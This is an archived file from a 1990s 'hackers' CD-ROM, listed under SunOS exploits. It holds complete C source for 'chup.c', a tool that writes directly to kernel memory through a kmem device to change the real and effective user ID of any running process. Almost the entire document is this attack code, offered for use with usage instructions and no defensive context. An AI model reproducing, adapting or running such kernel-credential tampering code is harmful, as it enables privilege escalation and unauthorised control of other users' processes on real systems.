For Beginners & Professional Hackers

home *** CD-ROM | disk | FTP | other *** search

/ For Beginners & Professional Hackers / cd.iso / hackers / exploits / sunos / sun-ch~1.asc next >

Wrap

Text File | 1997-03-11 | 4.4 KB | 166 lines

/* * chup.c - change uid of a running process. * Should work on any 4.2/4.3BSD based kernel. * Written by Avalon (avalon@coombs.anu.edu.au), 22/12/93. Ported to SunOS by x0d, me thinks. */ #include <stdio.h> #include <sys/types.h> #include <unistd.h> #include <sys/param.h> #define KERNEL #include <sys/file.h> #undef KERNEL #include <nlist.h> #include <sys/types.h> #include <sys/user.h> #include <sys/proc.h> #include <sys/ucred.h> /* #include <sys/processflags.h> /**/ #ifndef offsetof #define offsetof(t,m) (int)((&((t *)0L)->m)) #endif #define DEVKMEM "/home/new-kmem" struct nlist names[] = { { "_allproc", 0, 0, 0, 0}, { (char *)NULL, 0, 0, 0, 0 } }; static int kfd = -1, pid = -1, uid = -1, euid = -1, debug = 0; void fatal(status, msg) int status; char *msg; { perror(msg); exit(status); } static int lock_on() { return 0; } static int lock_off() { return 0; } int kopen() { return (kfd = open(DEVKMEM, O_RDWR)); } void kread(buf, pos, n) char *buf; off_t pos; int n; { if (!n) return; if (debug) printf("read %d @%#x to %#x on %d\n", n, pos, buf, kfd); if (lseek(kfd, pos, 0) == -1) fatal(-1, "k(r)lseek"); if (read(kfd, buf, n) != n) fatal(-1, "kread"); } int kwrite(buf, pos, size) char *buf; u_long pos, size; { if (lseek(kfd, pos, 0) == -1) fatal(-1, "k(w)lseek"); if (debug) printf("write %d to %#x from %#x on %d\n", size, pos, buf, kfd); if (write(kfd, buf, size) == -1) fatal(-1, "kwrite"); return 0; } int change_proc() { register int i; int np; struct proc p,*next; struct ucred ucr; if (nlist("/vmunix", names) == -1) fatal(-1, "nlist"); if (kopen() == -1) fatal(-1, DEVKMEM); if (lock_on() == -1) return -1; if(names[0].n_value ==0) fatal(-1, "no allproc"); kill(pid, SIGSTOP); kread((char *)&next, names[0].n_value, sizeof(struct proc *)); /* walk the linked list */ for (i = 0; next; i++) { kread((char *)&p, (char *)next, sizeof(p)); next = p.p_nxt; if (p.p_pid == pid) { if(!p.p_cred) fatal(-1, "no credentials with this process!"); kread((char *)&ucr, (char *)p.p_cred, sizeof(ucr)); printf("%d %d (uid %d, suid %d) uid %d euid %d\n", i, p.p_pid, p.p_uid, p.p_suid, ucr.cr_ruid,ucr.cr_uid); if (uid != -1) { ucr.cr_ruid = uid; kwrite((char *)&ucr + offsetof(struct ucred, cr_ruid), (char *)p.p_cred + offsetof(struct ucred, cr_ruid), sizeof(ucr.cr_ruid)); } if(euid != -1) { ucr.cr_uid = euid; kwrite((char *)&ucr + offsetof(struct ucred, cr_uid), (char *)p.p_cred + offsetof(struct ucred, cr_uid), sizeof(ucr.cr_uid)); } printf("set to %d %d\n", uid, euid); break; } } kill(pid, SIGCONT); if (!next) (void) fprintf(stderr, "process %d not found\n", pid); /* we're not going through that again :) else { kread((char *)p, (char *)pt + i * sizeof(*p), sizeof(*p)); kread((char *)&pcr, (char *)p->p_cred, sizeof(pcr)); if(pcr.pc_ucred != NOCRED) kread((char *)&ucr, (char *)pcr.pc_ucred, sizeof(ucr)); (void) printf("%d %d uid %d euid %d\n", i, p->p_pid, pcr.p_ruid, (pcr.pc_ucred!=NOCRED)? ucr.cr_uid : pcr.p_ruid); } */ lock_off(); } void printusage(name) char *name; { (void) fprintf(stderr, "usage:\n%s <pid> [uid [euid]]\n", name); } int do_args(argc, argv) int argc; char *argv[]; { if (argv[1] && !strcmp(argv[1], "-d")) argv++, argc--, debug = 1; if (argc == 1) { printusage(argv[0]); return -1; } if (kill(pid = atoi(argv[1]), 0) == -1) { perror(argv[0]); return -1; } if (argc > 2) { uid = atoi(argv[2]); if (argc > 3) euid = atoi(argv[3]); } return 0; } main(argc, argv) int argc; char *argv[]; { if (do_args(argc, argv)) exit(1); return change_proc(); }